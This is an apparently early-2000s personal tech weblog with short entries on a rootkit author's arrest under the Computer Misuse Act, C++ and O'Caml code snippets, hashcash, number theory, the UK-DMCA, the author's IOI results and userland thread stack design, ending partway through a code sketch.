    The author of the T0rn rootkit has been arrested [TheReg, BBC] under the Computer Misuse Act. This is a pretty worrying development because, from the sources, it seems that the only `offence' was writing that rootkit, and it isn't even very good. Hell, I could do better than that in a couple of days.

    Now, I don't support writing rootkits. I know nothing of the accused author, but most of the people using it wouldn't be suitable to wipe shit off my shoe. However, writing it shouldn't be a criminal offence, for two reasons:

    Firstly, where do you want to draw the line for `bad software' and who draws it? Is a rootkit bad ("sure, it's only used by little hax0r twits")? So how about exploit code? Or fragrouter? Or nmap? Or ping -f, or DeCSS, or even the Linux kernel? If we let the legal system start drawing lines then you just know that we are going to be trapped under a torrent of clueless idiots. The same kind of clueless idiots who are banning all computer games in Greece (I'm afraid that the court decision that said the law was wrong has been overturned) or calling t0rn a "route kit" (I kid you not, on BBC CEEFAX last night).

    Secondly, we have a DMCA like "code is speech" argument where you have to draw another line saying "under this is free speech and above it is an illegal tool". The DeCSS case has already shown the futility of that system. Exactly how detailed a description of a rootkit can I write before it's illegal?

    Unfortunately it seems that the clueless lawyers have decided to draw these lines anyway. Again. It's gonna be a damn busy wall.

    AaronSw

    Our very own AaronSw was on the World Service last night talking about warchalking (right at the end of Newshour). He has links to an ogg (1.8MB) and MP3 (3.2MB). He may well be on NPR's Weekend Edition on Saturday. Go Aaron!

    Iraq

    This isn't a warblog and, as such, I'm not making any value judgements about the whole Iraq situation. However, I can't stop cracking a smile at the wonderful bait-and-switch that Iraq has pulled. Only 6 days ago, Iraq was saying that inspectors would never be let in (wrapped in a lot of anti-US rhetoric). Now, Bush wants a war (not a value judgement) and saw this as a perfect point of conflict that would bring in the rest of the Security Council. That was the bait and Bush/Blair took it completely saying that Iraq wouldn't be attacked if inspectors went in.

    Then yesterday, Iraq switched and listening to the US trying to rebuild their case on Radio4 was just delicious.

    Coding

    When I know what I'm doing I can actually turn out a fair few lines in a day. None of it was anything stunningly deep, but I did about 500 (with some testing and debugging).

    Also, I'm going to play about with using weak pointers in this project. Having many interlinked structures (as this code has) can be a real pain when it comes to deleting anything, because leave any dangling pointers behind and pop goes the process.
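
    A minimal sketch of the weak-pointer idea, in Python rather than the language of the project itself. The `Node` class, `link` and `peer_name` are made up for illustration. The point is only that a weak reference does not keep its target alive, and that it reports the target's death instead of dangling:

```python
import weakref


class Node:
    """A hypothetical structure that is linked to from several places."""

    def __init__(self, name):
        self.name = name
        self.peer = None  # will hold a weak reference, not an owning one


def link(a, b):
    # Each side only holds a weak reference to the other, so neither keeps
    # the other alive and there is no cycle to untangle on deletion.
    a.peer = weakref.ref(b)
    b.peer = weakref.ref(a)


def peer_name(node):
    # Calling a weak reference yields the target, or None once it has gone.
    target = node.peer() if node.peer is not None else None
    return target.name if target is not None else None
```

    After `link(a, b)`, deleting `b` makes `peer_name(a)` return None rather than touching freed memory, which is exactly the failure mode the interlinked structures are prone to.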

    And this is interesting. To find the highest key in an STL map, the second code snippet works and the first prints 0:

    // first snippet: prints 0
    printf ("%d\n", (m.end()--)->first);

    // second snippet: prints the highest key
    map<int,int>::iterator i;

    i = m.end();
    i--;
    printf ("%d\n", i->first);

    Kernel Wish list

    Two things consistently bug me about the kernel, if anyone can send me a solution to either of these I would be most grateful:

    • When a process that was listening on a socket dies it can leave connections in the TIME_WAIT state which stops anything from binding to the same port for about a minute. I'm sure there is a very good reason for this on a LAN/WAN scale, but when developing stuff it's a total pain.
    • There's no good way to get a consistent time from the kernel. Something like milliseconds since the process started would be great, but most of the clocks the kernel provides either measure the wrong thing (e.g. times(2)) or are affected whenever someone changes the system clock (e.g. gettimeofday(2)). The closest I can get is the ITIMER_REAL timer, but it has a maximum setting of about 240 days on Linux and it could be much less under other kernels.
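
    For what it's worth, both wishes can be sketched on systems that provide the relevant facilities. This is an illustration under assumptions, not a claim about any particular kernel version: it assumes the `SO_REUSEADDR` socket option for the rebinding problem and a monotonic clock (exposed in Python as `time.monotonic`) for the timing problem. The function names are invented for the example, and the "start" is when the module is loaded, not strictly when the process started.

```python
import socket
import time


def listen_reusing_address(host, port):
    """Open a listening TCP socket that may rebind over TIME_WAIT leftovers."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # SO_REUSEADDR must be set before bind() to have any effect.
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    sock.bind((host, port))
    sock.listen(5)
    return sock


# Reference point taken once, when this module is first loaded.
_START = time.monotonic()


def ms_since_start():
    """Milliseconds since this module was loaded, immune to clock changes."""
    return int((time.monotonic() - _START) * 1000)
```

    A development server would call `listen_reusing_address("127.0.0.1", 8080)` (the port is arbitrary) instead of a bare bind, and use `ms_since_start()` wherever it currently relies on gettimeofday(2) for intervals.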

    Tao Te Ching

    Leaving on a more thoughtful note, here's an interesting quote I found reading through the Tao Te Ching (section 38, Stan Rosenthal's translation)

    The man who is truly wise and kind
    leaves nothing to be done,
    but he who only acts
    according to his nation's law
    leaves many things undone.

    coderman pointed out that...

    coderman pointed out that I was being an idiot with that map code, it should have been a prefix operator of course.

    <coderman> i think c++ makes everyone feel stupid at times. esp. with the STL you get very subtle effects that make sense in hindsight, but are extremely confusing at first light.

    Also, coderman suggested that gethrtime would be a good solution to the time problem. Indeed it would, if only it existed in Linux.

    Ian has a blog!!...

    Ian has a blog!!

    OpenSSL

    Power cut for about 10 hours today, grumble.

    Aaron pointed out that IV's TLS/qmail was probably vulnerable to the OpenSSL bug. I could have sworn that Debian released a security advisory for this, but I couldn't find it and, sure enough, metis still had 0.9.6c. There still isn't a DSA for this, but unstable has 0.9.6g (as does metis now). Thanks Aaron.

    Malaise

    JDarcy:

    My little corner of the blogosphere seems to have gotten a lot quieter lately. Obviously I've been updating less often than I used to, but many others - e.g. Zooko, AccordionGuy, even Wes Felter - seem to have gone through noticeably fallow periods of late. Whether the result is more or less visible output, everyone seems to be worried about whether they're getting enough (of whatever they want to do) done.

    The latest person to catch this apparently-communicable disease is coderman. In his latest article, he laments the slow progress on personal projects, but finds hope in this observation:

    I try to keep the posting frequency of IV at a reasonable level, but I do find that I'm not really reading or doing anything wonderfully worthwhile at the moment. In fact all this year I haven't really been coding anything significant. Mostly because I don't have any projects.

    People say stuff gets done when programmers have an itch, and it's pretty much true. When I know what I'm doing I code like mad, but I find gumption traps all too common, mainly when something isn't quite right. (I have an unfortunate perfectionist streak). Lately all the itches have been far too big (I've bitched about this before) and I don't feel up to fighting them.

    I sometimes think that I should work on Whiterose again since Oskar says that protocol is quite stable now. But then I look at the protocol doc and give up again.

    Maybe things will change at Imperial.

    (oh, Coderman is being told to spend more time with his wife via her blog)

    HashCash

    HashCash isn't a new idea, but it's being talked about again, which is a shame really because I haven't come across a single application where hashcash would work well. Adam Back lists a few at the end of the aforelinked paper, including flood limiting in Freenet. Ignoring the practical problems of integrating hashcash, the major problem is that it scales linearly. If I want to do 1 action, I pay x. If I want to do 5 actions I only pay 5x. There is no way to tell different requesting parties apart, so this is fundamental.
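
    To make the linear scaling concrete, here is a minimal hashcash-style sketch. It is a simplification and not the real stamp format: it assumes SHA-256 and a made-up `resource:nonce` encoding, and `leading_zero_bits`, `mint` and `verify` are names invented for this example. Minting costs about 2^bits hashes on average and verifying costs one, so minting 5 stamps is simply 5 times the work of minting one.

```python
import hashlib
from itertools import count


def leading_zero_bits(digest):
    """Number of zero bits at the front of a digest."""
    value = int.from_bytes(digest, "big")
    return len(digest) * 8 - value.bit_length()


def _stamp_digest(resource, nonce):
    # Hypothetical encoding: the resource string and the nonce joined by ':'.
    return hashlib.sha256(f"{resource}:{nonce}".encode()).digest()


def mint(resource, bits):
    """Search for a nonce whose stamp hash starts with `bits` zero bits."""
    for nonce in count():
        if leading_zero_bits(_stamp_digest(resource, nonce)) >= bits:
            return nonce


def verify(resource, nonce, bits):
    """Checking a stamp costs a single hash, however long minting took."""
    return leading_zero_bits(_stamp_digest(resource, nonce)) >= bits
```

    The only tunable is `bits`, which is the same for every requester. That is the fundamental limit described above: the scheme has no way to charge one party more than another.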

    Remember that computers from 5 years ago are going to be about 10 times slower than today's, and you hardly want to cut them off. So you either set the cost far too high, or spammers aren't going to notice it because buying a cheap cluster to calculate hashes isn't really going to bother them. (or even just write a virus/worm to make all the poor Windows users do it for you).

    And even in systems where he suggests that hashcash only kick in in a DoS situation (e.g. connection flooding) it doesn't provide "more graceful service" degradation as he claims. It simply moves the bottleneck from the CPU/network to the client, and the fastest client gets served first. (Which would be ok if all the attackers were much slower, but they aren't).

    An interesting development would be a computer generatable (my spell checker doesn't like that, but I think it's ok) challenge that only humans could solve. Possibly rendering some text and then messing it up would require a human to solve. That might still be impractical, and spammers could simply hire a sweatshop to solve them all day, but it would be interesting.

    That lawyer

    Oh, and on the spamming front; that lawyer who got blacklisted wrote back:

    When it comes to mail administration, it appears I was several years behind the curve. Since my mail server software, circa 1996, had been purring along quietly without problems since it was new, I had never upgraded it to a version capable of a higher degree of authentication. I'm also old enough to remember when an "open relay" was a relay intentionally left open for anyone to use, not one merely susceptible to misuse. Thanks to all of the readers who wrote to bring me into the new millennium. Both my software and my definition are now upgraded.

    At the same time, I labelled the blackhole list operators "vigilantes" for good reason. It was always my understanding that if you lie about your identity to gain access to something that would be closed to you if you told the truth, you've done something wrong. That's true whether you intend to send spam or prevent it. As vile as spam is, the ends don't justify the means. Regardless of whether my mail server used to be "open" or not, I stand by the legal analysis that placed fault on the blackhole operators who forged their identity.

    The wonders of editing

    I'm still not sure if this is a spoof or not. If it is, it's a very good one. Quick summary: US lawyer (IP lawyer, naturally) finds his mail server is listed as an open relay, denies that it is one (while giving enough of the story to show that it is) and immediately talks of legal action against the anti-spam group without a thought to fixing the mail server. A good laugh, spoof or (tragically) not.

    Via JWZ:

    Senator Clinton was booed when she walked on stage last October at a rock concert in Madison Square Garden to benefit 9/11 victims. It was shown live by VH1 but, as ABC's John Stossel illustrated in a July 20/20 special on media distortions, when the Viacom-owned cable channel replayed it sound technicians replaced the booing with cheering and applause. And that version is the permanent record VH1 put onto its DVD of the event.

    source

    RedHat 7.3 Install

    (all of the following section is tongue-in-cheek)

    Installed RH7.3 on a spare drive last night (long story involving odd hardware and a friend needing it) and I'm shocked how easy the install was. Gosh darn it! I can still remember when installing Linux was no mean feat and I'm so young that my first Linux distrib (Slackware) had a 2.0.0 kernel.

    In those days an install was a maze of quirks and hardware problems littered with dire warnings about how X would fry your monitor if you got the frequencies wrong. Heck, you were damn lucky if today's kernel managed to exec /bin/sh. In those days spirits were brave, the stakes were high, men were real men, women were real women, and small furry creatures from Alpha Centauri were real small furry creatures from Alpha Centauri.

    The damn RH install was graphical (even has a graphical GRUB menu) and picked up all my weird hardware first time and even got X going with DRI. The only thing it didn't detect is that I have 2 monitors. No wonder there are so many Linux lusers on /. if the install is this easy!

    Proof systems

    There is a proof system for O'Caml called Coq. I keep running off to theme parks and things so I haven't had a chance to read it yet.

    Some languages are "safe" in the sense that you cannot dereference NULL pointers etc. Typed languages ensure that arguments to functions cannot be of the wrong type etc. Proven languages can ensure (incomplete list):

    • The program won't segfault...
    • ... or buffer overflow...
    • ... or loop forever ...
    • ... or even call APIs badly

    In fact you could even give everyone root permissions, but require that programs prove that they aren't doing anything wrong.

    This type of thing is obviously very useful generally but, as has been pointed out many times, we could even get rid of operating systems because no program would do anything nasty (and we could prove this). In a single-level store design having all the programs in a single address space could be a big performance boost.

    Mersenne Primes and Perfect Numbers

    Mersenne primes (named after a French monk) are of the form 2^n - 1 where n is an integer greater than 0. There is a distributed.net-like effort to find them called GIMPS (search Google).

    A perfect number is a number where the sum of its divisors (excluding itself, but including 1) equals that number. For example 6 is perfect because (1 + 2 + 3) = 6. Equivalently, the sum of all the divisors (including the number itself) is twice the number.

    Now, I read a while back in a book that (2^(n-1))(2^n - 1) was proven to be a perfect number whenever 2^n - 1 is prime, but the book didn't have the proof. Thankfully, I ran across the proof today. That proof leaves out a number of steps though, so here's a better one:

    • p = 2^n - 1, and is prime
    • m = (2^(n-1))p
    • sigma(x) is the sum of all the positive divisors of x
    • sigma(a*b) = sigma(a)*sigma(b) where gcd (a, b) = 1 (think about it)
    • sigma(m) = sigma(2^(n-1) * p)
    • = sigma(2^(n-1)) * sigma(p), since p is odd and so gcd (2^(n-1), p) = 1
    • Now, p was defined to be prime, thus its only divisors are 1 and itself, thus the sum of those divisors must be p + 1
    • Also, by thinking of the prime factorisation of 2^a, the divisors of 2^a must include all lesser powers of 2 (where the power is greater than, or equal to, 0). By still considering the prime factorisation there can be no other divisors. Thus sigma(2^(n-1)) = 1 + 2 + ... + 2^(n-1), which must be 2^n - 1. It might help to think of the numbers in binary form to see this.
    • thus sigma(m) = (2^n - 1)(p + 1)
    • substituting p + 1 = 2^n gives 2^n (2^n - 1), which is equal to 2m.
    • Thus the sum of all the divisors of m is 2m. Thus m is perfect.
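
    The result is easy to check numerically for small exponents. The sketch below is only a sanity check of the proof and not an efficient search (nothing like what GIMPS does). `sigma`, `is_prime` and `perfect_from_exponent` are names chosen for this example, and the divisor sum is done by plain trial division.

```python
def sigma(x):
    """Sum of all positive divisors of x, including x itself."""
    total = 0
    d = 1
    while d * d <= x:
        if x % d == 0:
            total += d
            if d != x // d:
                total += x // d  # the matching divisor above sqrt(x)
        d += 1
    return total


def is_prime(p):
    # A prime has exactly two divisors, 1 and itself, so sigma(p) == p + 1.
    return p > 1 and sigma(p) == p + 1


def perfect_from_exponent(n):
    """Return 2^(n-1) * (2^n - 1) if 2^n - 1 is prime, else None."""
    p = 2 ** n - 1
    if not is_prime(p):
        return None
    return 2 ** (n - 1) * p
```

    For n = 2, 3, 5 and 7 this yields 6, 28, 496 and 8128, and in each case `sigma(m) == 2 * m` holds as the proof says it must.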

    One from The Book

    O'Caml

    After a brief holiday, The Memory Hole is ticking again.

    People keep talking about it and it's high time that I looked into it. O'Caml is an ML based language and has all the standard ML language stuff (curried functions etc). It uses inferred typing, which is very useful, despite the few drawbacks (more on that later).

    It also has polymorphic typing:

    # let f = function (a, b) -> a;;
    val f : 'a * 'b -> 'a = <fun>

    That function takes a 2-tuple of any two types and returns the first element; the polymorphism is inferred and checked by the type system.

    There is a translation of a French O'Reilly O'Caml book online, but I find it's a little heavy for an introductory text. I find that this book is nicer to start with. Maybe move on to the O'Reilly book afterwards.

    This code snippet, which implements red-black binary tree insertion, should demonstrate the power of O'Caml even if you don't understand it. (This assumes you've seen what a mess a red-black insert looks like in C/C++. If not, see this, and I have reasonable reason to suspect there's an error in there since it was done partly from CLR).

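    (* types assumed by the snippet; not shown in the original listing *)
    type color = Red | Black
    type 'a tree = Leaf | Node of color * 'a tree * 'a * 'a tree

    let balance = function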
      Black, Node (Red, Node (Red, a, x, b), y, c), z, d ->
        Node (Red, Node (Black, a, x, b), y, Node (Black, c, z, d))
      | Black, Node (Red, a, x, Node (Red, b, y, c)), z, d ->
        Node (Red, Node (Black, a, x, b), y, Node (Black, c, z, d))
      | Black, a, x, Node (Red, Node (Red, b, y, c), z, d) ->
        Node (Red, Node (Black, a, x, b), y, Node (Black, c, z, d))
      | Black, a, x, Node (Red, b, y, Node (Red, c, z, d)) ->
        Node (Red, Node (Black, a, x, b), y, Node (Black, c, z, d))
      | a, b, c, d ->
        Node (a, b, c, d)
        
    let insert x s =
      let rec ins = function
        Leaf -> Node (Red, Leaf, x, Leaf)
      | Node (color, a, y, b) as s ->
          if x < y then balance (color, ins a, y, b)
          else if x > y then balance (color, a, y, ins b)
          else s
      in
        match ins s with    (* guaranteed to be non-empty *)
          Node (_, a, y, b) -> Node (Black, a, y, b)
        | Leaf -> raise (Invalid_argument "insert");;
    

    However, there are a couple of silly bits in O'Caml. Firstly, the bitwise (not logical) AND function is called land. Secondly, the namespace for record fields is flat within a module, so you can't have 2 record/struct types with the same named field in a single module. I'm pretty sure that there isn't a deep reason for that (the shallow reason has to do with type inference).

    Dee M Cee A!

    From one of Coderman's friends....

    (Sung to the tune of Y.M.C.A by the Village People)
    
    Net geeks
      There's no need to feel guilt
    I said, net geeks
      For the software you built
    I said, net geeks
      'Cause you're not in the wrong
    There's no need to feel unhappy!
    
    Net geeks
      You can burn a CD
    I said, net geeks
      With your fave mp3s
    You can play them
      In your home or your car
    Many ways to take them real far!
    
    It's fun to violate
      the D M C A !
    It's fun to violate
      the D M C A-AY !
    You have everything
      You need to enjoy
    Your music with your toys!
    
    It's fun to violate
      the D M C A !
    It's fun to violate
      the D M C A-AY !
    
    You can archive your tunes
      You can share over cable
    You can annoy the
      Record Labels!
    

    Photos from the IOI are u...

    Photos from the IOI are up. There aren't many, but hopefully Richard got lots more on his (really nice) digital camera.

    Lightbulbs and Quantum Physics

    Discovered a MAP_GROWSDOWN flag in asm/mman.h, unfortunately it doesn't seem to do what one would hope.

    Stand have a longish entry on the UK-DMCA. They suggest that the chances of parliament nullifying it are pretty much nil (which, I guess, is depressingly true), and suggest that people write to the UK Patent Office and the Secretary of State for Trade and Industry and try to get more opt-out clauses into the UK law. There has been far too little press coverage about this so far. I've contacted New Scientist, so hopefully they will have something.

    There's also a chance that NS will have a short section on the IOI. I only hope they don't include that god awful photo of the team taken at Cambridge. (and, no, I'm not giving the link!)

    One of the defining characteristics of quantum physics, over and above the classical, is that it is non-deterministic. Many people have had problems with this, most famously Einstein ("God does not play dice!"). A deterministic universe is very comforting to some people (myself half included) and certainly sits nicely with the logical worlds of maths and computers.

    Since many classical processes are statistically modelled (for example, temperature) because it's not useful to deal at the level of individual, vibrating molecules, some have suggested that the only reason that quantum physics looks non-deterministic is because we are only seeing the cumulative effects of an underlying deterministic system. These ideas are usually called hidden variable theories.

    I'm going to run over an argument that TBL gave to me and that's pretty much convinced me to give up on hidden variable theories.

    Imagine a light bulb which, at time t, is either on or off and its state is totally random. That's non-deterministic. Now imagine that a pseudo-random number generator (or a Rule 30 CA if you wish, Mr Wolfram) is hidden in the light bulb and actually governs the bulb's state. Given enough time we might be able to reverse the PRNG and that would be a deterministic universe.

    Now, our quantum universe might be really non-deterministic or it might have a deterministic process underlying it. However, Bell's Theorem shows that, if there is an underlying deterministic process, then it cannot be localised. So you could not take a section of the universe and have it be deterministic, only (possibly) the whole universe. However, we are in the universe, and so cannot measure every roll of the dice. So in the end you might as well give up on it being deterministic, because it would be a useless determinism anyway.

    Well, seems that JDarcy s...

    Well, seems that JDarcy sent in a comment, but changed the subject line so the comment processor rejected it. I thought the subject lines were odd enough looking that people would realise they denote the entry to be commented (or the comment to be commented in the case of threading).

    Anyway. The processor (silently) drops malformed mails so we will never know what insightful words JDarcy had for the world (unless he reposts).

    Having said that, no one has yet managed to get a comment up. People have even mailed me about the comment system rather than post a comment!

    Comments System

    Well, turns out that the builders cut the power on Friday (about 3:30 BST) and metis lasted about 45 minutes on the UPS before dying. Since it's softswitched it doesn't power up when the power comes back on (which sucks) and I should get the UPS software working better. Oh, and by the way, I hate builders.

    Is an email-based comments system a blogging first? Well, it's here anyway. Still a little rough about the edges but nothing a little testing (and bug reporting) can't fix (hint!).

    Should I put the mails in <pre> tags? At the moment I turn blank lines into <br><br> but that's all.

    Ecstasy not dangerous?

    Reports suggest that E mightn't be the instantly fatal rat-poison we thought it was. Well, we knew that anyway and it's nice to see a report that isn't funded by the US govt to repeat that "Drugs are baaaad".

    But don't forget that E is still the most adulterated street drug on the planet. It's been cut with everything under the sun, some of it pretty nasty.

    Hardware Hell

    It has been a really bad few days for hardware. Firstly, metis (the server which hosts IV) dropped off the face of the net sometime Friday. As I write this it's still down, but I'll be going in to see what died tomorrow. Hopefully it just hit its mean time between failure for the memory and a bad bit flip killed it. Then again, another rat may have pissed in the power supply and shorted it out (I kid you not - that's what killed it last time).

    Talking of PSUs I think I need a new one. Twice today my SCSI array failed which causes a reasonably slow, but always fatal, system failure as more and more processes get stuck in the escalator. I'm pretty sure that I'm browning out the power supply having in my case, as I do:

    • 2 Processors
    • 4 9GB SCSI drives
    • A 20GB IDE drive
    • G400 Video card
    • 2 SCSI cards
    • DVD drive
    • Modem
    • 3 ISA cards

    Time for a bigger PSU I think

    Math's Gem

    Ok, so I'm sure it's a really well known result in number theory, but it's the first time I've seen it:

    For any positive integer n, to find the number of factors of n, find the exponents of the primes in its prime factorisation (call that list a) and eval (reduce #'* (mapcar (lambda (x) (+ x 1)) a))

    For example: where n=12 the prime factorisation is 2^2, 3^1 so a=(2, 1) and it has (2 + 1)(1 + 1) = 6 factors (namely 1,2,3,4,6,12)
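
    The same calculation as a small runnable sketch, with the factorisation step included. `prime_exponents` and `count_factors` are names invented here, and trial division is only an assumption that keeps the example short:

```python
from functools import reduce
from operator import mul


def prime_exponents(n):
    """Exponents in the prime factorisation of n, by trial division."""
    exponents = []
    d = 2
    while d * d <= n:
        if n % d == 0:
            e = 0
            while n % d == 0:
                n //= d
                e += 1
            exponents.append(e)
        d += 1
    if n > 1:
        exponents.append(1)  # whatever is left is a single prime factor
    return exponents


def count_factors(n):
    # Same shape as the Lisp above: add one to each exponent, then multiply.
    return reduce(mul, (e + 1 for e in prime_exponents(n)), 1)
```

    `prime_exponents(12)` gives `[2, 1]` and `count_factors(12)` gives 6, matching the worked example.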

    Comments

    It's a pretty standard feature of most blogs that users can add comments. Well, IV has never had that because it would require PHP (or something similar) and I just don't trust apache/PHP to be secure. However, after a remark from Ian I thought that I might be able to have an email based comment system. Watch this space.

    Static analysis of code

    I mentioned on Friday that statically analysing untrusted machine code to prove that it's safe to run might be a good idea (go read the post if you haven't already). Well, having thought about it (and looked at RTL) I'm thinking that working with C code might not be so bad after all. I've found a library (CTool) that looks as if it will make the whole parsing a lot easier. Again, watch this space.

    BRiX

    BRiX (which I linked to yesterday) popped up on /. while I was in Korea and I've only just got round to having a look at it.

    Basically, it's a safe-language OS (where the OS doesn't need to protect processes from each other because the language they are all written in prevents them being bad). It's an old trick, but I've never seen a serious implementation and it would be cool if BRiX reached even a first-beta level (satanic red on black colour scheme notwithstanding).

    However, I'm undecided on the merits of the safe-language approach. Firstly it mandates that every program be written in the language/byte code (which changes with each safe-language OS). In BRiX's case the language is called Crush and looks like a typed dialect of Lisp. Learning a new language and rewriting everything in it is a nasty barrier to entry, even if it does hold a certain appeal in terms of cleaning out old code.

    With this in mind I'm wondering if a decompiler could statically analyse compiled C code and determine if it's safe. I think, in theory if system calls were treated as non-deterministic, then it should be possible. The practice, on the other hand, might be somewhat painful.

    Just a quick FAQ for anybody asking "Why work with machine code, why not the C code?" Mainly because I think I would end up compiling the C code to a reasonably low level anyway. By working from the C code I might get some loop structure etc for free, but since it's perfectly legal to build loops out of gotos I would have to do control-flow analysis anyway, so why have the pain of processing C?

    It might be that working with RTL (gcc's intermediate code rep) would be better. There are flags for dumping RTL trees (see your gcc manpage) but I have no experience with RTL. And, of course, if you are happy with the machine code you can run it, but if you are only happy with the RTL you still have to trust a compiler to generate good binaries.

    802.11b networks

    Assorted (but unsorted) links:

    Coderman is talking (a little) about P2P radio networks:

    Wide spread internetworked wifi hot spots + decentralized peer networks + strong crypto == sweet ass high speed unrestricted digital networks. The possible applications of such networks are extremely exciting (IMHO).

    The Freenet team were discussing this idea last year, not really anything to do with Freenet, but as a general point. I don't think this idea is really going to take off until there is a certain density of clueful people with 802.11b in a given area. However, this may already have happened in several places.

    Personally, I have far too little experience with 802.11b. The only time I've ever found an AP was in a hotel in Guildford and even then the AP was configured not to do anything. So I could pretty much SNMP walk it, ping it and little else.

    However, I agree totally with Coderman that it could be insanely cool.

    Much of the work on P2P wireless routing has dealt with getting packets to gateways over a number of hops. Basically a 2 tier network where packets are always going to, or coming from, a gateway. This is a much simpler problem than P2P routing over a network where the nodes will be moving.

    Now, one of the cool things that wireless networks do well is broadcast. I mean - it really is a broadcast and the bandwidth needed is independent of the number of nodes that are reached. Most routing protocols are designed for a wired world where broadcasting to n nodes requires n packets. I'm sure there are some cool routing protocols for this which don't require nodes to know their GPS position, though I'll have to think some more about it.

    (and, of course, true broadcast makes DC rings worth considering for some problems)

    Crap. I so forgot to uplo...

    Crap. I so forgot to upload the MP letter yesterday. Fixed.

    This is quite an interesting example of bullshit in its purest form. It's pretty rare to find anything this pure. I would pull some quotes from it, but that would dilute this, a masterpiece of its art-form [via Wes]

    Today's required reading is the beginning few chapters of the MetaMath book [via Raph]

    Results

    Right, I'm back from the IOI [warning: utter crap website]. I did pretty crap (about half way down I think). Partly because of a very depressing number of tiny, but critical, typos but mostly because I don't think I'm cut out for this timed algorithmic stuff. Give me a couple of days to think about something and I might come up with a decent algorithm. In 30 minutes it doesn't happen. I guess I could have done a lot better if I had just chosen poor, but simple algorithms - but that's not really in the spirit of the competition.

    I'll have photos scanned at some point, both from my camera and Richard's (the UK team leader) very impressive digital camera. That will be in a week or so.

    If I learnt one thing from my time in Korea it's this: Don't eat the Kimchi. Don't even ask about it.

    The IOI was held at Kyung Hee University in Yong-In, Korea. It's a very nice campus, even if some of the buildings are bad European architecture copies. You can dig up the schedule of events and stuff from the website linked to above.

    It was superbly organised (with a budget of $2.2 million) to the point that our convoy of 24+ coaches (which took us everywhere) had a full police escort which closed off the roads ahead of us to let us pass.

    The guards armed with guns that looked like they could stop a tank were a little worrying. As was the day when we came back to find about 100 riot police sitting on their shields and waving at us. The small number of protesters, who had been protesting about KHU's treatment of the hospital workers, had gone.

    I've scanned the protesters' flyer: side one, side two (help make your daily karma quota by reading it).

    The translations of some of the Korean into English (the official IOI language) provided some good laughs. It seems that Korean doesn't have the concept of articles, which is why they often miss out `the' and `a'. (Do an impression and you'll see that you do the same.)

    The next IOI (which I'll be too old for) is being held in the US. Unfortunately their major (only?) sponsor, USENIX, has dropped out. If your helpful company, with their huge amounts of cash-flow in these great economic times, would be interested in funding the US IOI I'm sure they would love to hear from you.

    The day before I went to Korea was A-level results day. Got the results at 10:30, out with friends until 1am the next morning and was up to go to the airport at 5am. One manic day.

    Type     Subject        Grade
    A-Level  Biology        A
    A-Level  Maths          A
    A-Level  Further Maths  A
    A-Level  Physics        A
    AEA      Biology        Distinction
    AEA      Physics        Merit

    A-Levels are the standard exam taken at 18. AEAs are super-A-levels which you don't study for (at least I didn't).

    Those results easily get me into Imperial College.

    EUCD (UK-DMCA)

    I've yet to check what organisations (like EuroRights and Stand) have been doing on this front but I had a neat letter from my MP in the post when I got home. You can see the scan here:

    I can assure you that I am sceptical of anything coming from the EU and, in your letter, you give good reasons why we should consider annulling this one - if we can!

    I will, therefore, take the matter up once Parliament resumes and will write to you again then. In the meantime, [thank] you for alerting me to this important issue

    The Conservatives are the second party in the UK (and Labour, the first party, has a huge majority) so I'm not optimistic about getting this thing annulled. But at least we may be able to kick up a storm and raise the public perception.

    Crypto-GRAM

    It's nice to know that even people like Bruce Schneier have total brain farts sometimes too.

    The idea is that different users on the system have limitations on their abilities, and are walled off from each other. This is impossible to achieve using only software

    Question of the day

    Will a random walk in discrete n-dimensional space tend to cover the whole space, or only a fraction of it? If only a fraction, what fraction?

    (P.S. I don't actually know the answer)
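
    One way to get a feel for the question is to simulate it. What follows is a minimal sketch in Python, assuming a simple walk on the integer lattice that moves one unit along one randomly chosen axis per step; the name distinct_fraction and the step counts are made up for illustration. It reports what fraction of the positions visited were new sites. (The classical result in this area is Pólya's recurrence theorem: the walk returns to its starting point with probability 1 in one and two dimensions, but not in three or more.)

```python
import random


def distinct_fraction(dims, steps, seed=0):
    """Walk `steps` unit steps on the integer lattice Z^dims and return
    (number of distinct sites visited) / (steps + 1)."""
    rng = random.Random(seed)
    pos = [0] * dims
    seen = {tuple(pos)}
    for _ in range(steps):
        axis = rng.randrange(dims)        # pick one axis at random
        pos[axis] += rng.choice((-1, 1))  # step one unit either way
        seen.add(tuple(pos))
    return len(seen) / (steps + 1)


if __name__ == "__main__":
    for dims in (1, 2, 3, 4):
        print(dims, distinct_fraction(dims, 20000))
```

    The fraction of fresh sites climbs as the dimension goes up, since the walk has ever more room to wander off and not come back.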

    Back home. Need sleep....

    Back home. Need sleep.

    New addition to the Lette...

    New addition to the Letters page; a letter about the UKDMCA to my MP.

    Hmm, even 512 kbit/s Ogg Vorbis cannot encode some music quite right - I can still hear the artifacts and don't even think about mentioning MP3. So I've taken to using lossless compression - flac is good, open source and has an XMMS plugin. I'm getting about 25% compression.

    UK-DMCA

    Coderman is working on a new project - PeerFrogs. Looks like it forms the basis for his CodeCon 2 submission.

    From Danny O'Brien (the NTK guy):

    I'm pretty sure it's a statutory instrument with negative resolution -
    which is to say, it becomes law the moment it's announced, but
    Parliament has forty days to pass a motion annulling it. AFAIK, that's
    how most EU Directives are implemented.
    

    Oh crap

    That means MPs have to get off their backsides and actually do something active. We're screwed.

    Userland page fault handling

    One of the weaknesses of user land threading is that you have to alloc a fixed area as thread stack space. This imposes an extra, non-trivial, cost on thread creation as the stack size for all threads is determined by the biggest (unless you pass a hint at creation time which is dangerous).

    The solution to this is to do the same as the kernel does; handle page faults as the threads fall off the bottom of the stack space and map in pages to catch them. That way you still have to set a fixed max size for stacks - but you don't have to map in all those pages. You use up address space, not memory.

    Of course, address space isn't exactly huge on a 32-bit machine. On most Linux boxes I think dlls are mapped in at 0x40000000 (it's 0x00100000 here, but that's because I run funny kernel patches). That leaves half the address space free for mapping since the main stack grows down from the 3GiB mark.

    So, assuming that we have 2GiB of address space for stacks we can reserve 128KiB for each stack and fit in 16384 threads. When you consider that most threads will take at least about 8KiB of actual stack, and that 8KiB*16384 = 134MB of stack, that limit doesn't seem too bad. (It's still not great though, and there is some deep&dangerous hackery that can get around it, email me if you want details).
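
    The arithmetic there is easy to check. A quick sketch in Python, using only the figures from the paragraph above; the variable names are mine, and the 8KiB of touched stack per thread is a guess rather than a measurement:

```python
KIB = 1024
MIB = 1024 * KIB
GIB = 1024 * MIB

address_space = 2 * GIB         # space assumed free for thread stacks
reserved_per_stack = 128 * KIB  # address space reserved per thread
touched_per_stack = 8 * KIB     # stack actually mapped per thread (a guess)

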